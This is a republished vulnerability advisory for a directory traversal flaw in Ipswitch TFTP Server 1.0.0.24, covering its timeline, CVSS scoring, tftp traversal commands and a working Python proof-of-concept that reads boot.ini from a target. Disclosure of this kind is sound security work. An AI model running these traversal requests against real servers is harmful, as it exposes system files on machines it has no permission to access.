RSS Feed
TwitterIpswitch TFTP Server Directory Traversal Vulnerability
############################################################################### Title : Ipswitch TFTP Server Directory Traversal Vulnerability |
# Author : Prabhu S Angadi from SecPod Technologies (www.secpod.com) |
# Vendor : http://www.whatsupgold.com/index.aspx |
# Advisory : http://secpod.org/blog/?p=424 |
# http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt |
# http://secpod.org/exploits/SecPod_Ipswitch_TFTP_Server_Dir_Trav_POC.py |
# Version : Ipswitch TFTP Server 1.0.0.24 |
# Date : 02/12/2011 |
SecPod ID: 1028 13/09/2011 Issue Discovered |
04/10/2011 Vendor Notified |
No Response from Vendor |
02/12/2011 Advisory Released |
Class: Information Disclosure Severity: Medium |
Overview: |
--------- |
Ipswitch TFTP Server 1.0.0.24 is prone to a directory traversal |
vulnerability. |
Technical Description: |
---------------------- |
The vulnerability is caused due to improper validation to Read Request |
containing '../' sequences, which allows attackers to read arbitrary |
files. |
Impact: |
-------- |
Successful exploitation could allow an attacker to obtain sensitive |
information. |
Affected Software: |
------------------ |
Ipswitch TFTP Server 1.0.0.24 |
Tested on: |
----------- |
Ipswitch TFTP Server 1.0.0.24 on Windows XP SP3 & Windows 7. |
References: |
----------- |
http://www.ipswitch.com/ |
http://secpod.org/blog/?p=424 |
http://www.whatsupgold.com/index.aspx |
http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt |
http://secpod.org/exploits/SecPod_Ipswitch_TFTP_Server_Dir_Trav_POC.py |
Download Link: |
-------------- |
http://www.whatsupgold.com/free-software/network-tools/tftp-server.aspx |
Proof of Concept: |
---------------- |
tftp> get ../../../../../../../../../../../boot.ini |
tftp> get ../../../../../../../../../../../windows/win.ini |
Solution: |
---------- |
Not available |
Risk Factor: |
------------- |
CVSS Score Report: |
ACCESS_VECTOR = NETWORK |
ACCESS_COMPLEXITY = LOW |
AUTHENTICATION = NOT_REQUIRED |
CONFIDENTIALITY_IMPACT = PARTIAL |
INTEGRITY_IMPACT = NONE |
AVAILABILITY_IMPACT = NONE |
EXPLOITABILITY = PROOF_OF_CONCEPT |
REMEDIATION_LEVEL = UNAVAILABLE |
REPORT_CONFIDENCE = CONFIRMED |
CVSS Base Score = 5.0 (AV:N/AC:L/Au:NR/C:P/I:N/A:N) |
CVSS Temporal Score = 4.5 |
Risk factor = Medium |
Credits: |
-------- |
Prabhu S Angadi of SecPod Technologies has been credited with the discovery of |
this vulnerability. |
POC : |
====== |
import sys, socket |
def sendPacket(HOST, PORT, data): |
''' |
Sends UDP Data to a Particular Host on a Specified Port |
with a Given Data and Return the Response |
''' |
udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) |
udp_sock.sendto(data, (HOST, PORT)) |
data = udp_sock.recv(1024) |
udp_sock.close() |
return data |
if __name__ == "__main__": |
if len(sys.argv) < 2: |
print '\tUsage: python exploit.py target_ip' |
print '\tExample : python exploit.py 127.0.0.1' |
print '\tExiting...' |
sys.exit(0) |
HOST = sys.argv[1] ## The Server IP |
PORT = 69 ## Default TFTP port |
data = "\x00\x01" ## TFTP Read Request |
data += "../" * 10 + "boot.ini" + "\x00" ## Read boot.ini file using directory traversal |
data += "netascii\x00" ## TFTP Type |
## netascii |
rec_data = sendPacket(HOST, PORT, data) |
print "Data Found on the target : %s " %(HOST) |
print rec_data.strip()
0 Response to "Ipswitch TFTP Server Directory Traversal Vulnerability"
Post a Comment